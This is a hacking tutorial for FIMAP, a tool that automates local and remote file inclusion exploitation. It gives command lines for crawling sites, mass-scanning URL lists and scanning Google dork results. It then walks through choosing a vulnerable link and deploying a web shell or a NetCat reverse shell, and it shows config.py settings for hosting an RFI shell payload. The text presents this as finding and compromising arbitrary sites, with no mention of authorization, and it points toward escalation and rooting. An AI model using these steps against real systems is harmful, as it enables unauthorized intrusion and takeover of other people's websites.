Automated Local File Inclusion / Remote File Inclusion Scan and Exploit (FIMAP)


Today, we are going to take a look at how to use a tool called FIMAP. This is a python based tool made to perform automated LFI (Local File Inclusion) exploitation and gain shell access on a target site. LFI vulnerabilities are almost like searching for SQL Injection vulnerabilities… Unfortunately, they are more time consuming and currently it is getting more difficult to find sites that are straight up vulnerable. The time it takes to craft requests to find this vulnerability, by hand, is painstaking and so this is why we are going to take a look at this tool. It is capable of running single target scans, Google dork scans, and list file scans. Guess what… It can also crawl a site and create a list file to scan other linked sites. Ridiculous right?

Pre-requisites:

  • Python installed on system already
  • Download copy of FIMAP here: DOWNLOAD
  • Brain power & patience

OK so assuming you already have Python installed you will download the latest version of FIMAP from its Google code home provided above, and extract to you desired location and then we can begin. You will need to open your command prompt and navigate to the extraction point (unless you added things to your global environment PATH). You can type “fimap.py –h” to see a quick overview of what options are available, should look like this:

FIMAP-1

 

It looks like a lot at first but once you review it is fairly easy to pick up on the syntax and options, as you will find most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan, and Harvest mode. Single scan performs LFI check and audit against a single url. You just supply the URL to scan and it goes to work.

Code:

fimap.py –s –u http://target-site.com/index2.php?x=

If you are only going to be scanning a single target site then I highly suggest you run a scan using the Harvester mode first to help increase the chances of finding a vulnerable link. You can simply point FIMAP at the root directory of a site in Harvester mode and it will generate an output file for you to feed into the Mass scan. It looks like this:

Code:

fimap.py –H –u http://target-site.com/ -w output.txt

NOTE: you can define the crawl depth by adding the “-d <number of pages to crawl>” flag, as the default is set to 1

Code:

fimap.py –H –u http://target-site.com/ -d 3 –w output.txt

Now that we have our output file we can follow things up by switching to the Mass scan mode and audit all of the links we found when we used the Harvester mode. You just point it to the “output.txt” file from above steps and let it do its thing, like so:

Code:

fimap.py –m –l /path/to/list/output.txt

 

 

 

 

 

FIMAP-2

FIMAP-3

If you prefer to run some large scans using Google and your favorite Google dorks you can switch modes and use the following syntax:

Code:

fimap.py –g –q inurl:index2.php?x=

FIMAP-4

It will run similar to the mass scan mode until it reaches the end of the results…

FIMAP-5

NOTE: You can further define the Google scan parameters by defining the time in between Google requests using “–googlesleep=<time>” and the pages to read for results from using “-p <page number>”. If you define the number of pages to return you can also add the number of results per page to use using “–results=<10,25,50,100>”, with 100 being the default value. The full syntax would look like this:

Code:

fimap.py –g –q inurl:index2.php?x= –googlesleep=5000 –p 15 –results=50

Now once you have run your scans you will be wondering where the results are stored. You can find them in two files, which you will need to search for on your system: fimap_results (xml) and fimap-log (txt). These two files contain the stored results from all of your scans. The location depends on what type of system you are using so just use the run box or the locate command to find them on you system. You can also type “-x” to see a list of possible targets to perform exploitation attempts against in a nice easy to follow interactive session:

Code:

fimap.py –x

FIMAP-6

Simply choose the desired target by entering the number provided. Once a target is selected you will have the opportunity of choosing which vulnerable link to try to exploit. It looks like this:

FIMAP-7

Once you choose the link to exploit you will have the chance to choose the final payload to use. The default options consist of an integrated shell on the target site or a reverse shell for which you can connect to using NetCat on your local system. The fimap shell is not an interactive shell so you will not be able to use services like SSH but you can use it to gain foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here is end results from successful exploit using the fimap shell:

FIMAP-8

You can also play with the configuration file so that you can add some additional features. Most notably you can add support to test for RFI vulnerabilities as well. You simply add the hosting details for your shell of choice into the “config.py” file, save, and then perform quick test to see if it is working. Here are the lines that need to be edited (in RED); I suggest using the FTP mode if you have the ability to host your shell somewhere:

# FTP Mode

settings[“dynamic_rfi”][“ftp”] = {}

settings[“dynamic_rfi”][“ftp”][“ftp_host”] = None

settings[“dynamic_rfi”][“ftp”][“ftp_user”] = None

settings[“dynamic_rfi”][“ftp”][“ftp_pass”] = None

settings[“dynamic_rfi”][“ftp”][“ftp_path”] = None # A non existing file without suffix. Example: /home/imax/public_html/payload

settings[“dynamic_rfi”][“ftp”][“http_map”] = None # The mapped HTTP path of the file. Example: http://localhost/~imax/payload

 

# Local Mode

settings[“dynamic_rfi”][“local”] = {}

settings[“dynamic_rfi”][“local”][“local_path”] = None # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload

settings[“dynamic_rfi”][“local”][“http_map”] = None # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload

 

Here is the command to test your RFI configuration to see if it will work for exploiting vulnerable links:

Code:

fimap.py –test-rfi

This covers the basic usage for FIMAP. This tool is still under development so I encourage you to follow the project for more updates to come. If you want to truly learn how LFI works, then I encourage you to try this out manually after you have found a few with the assistance of the tool.


Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *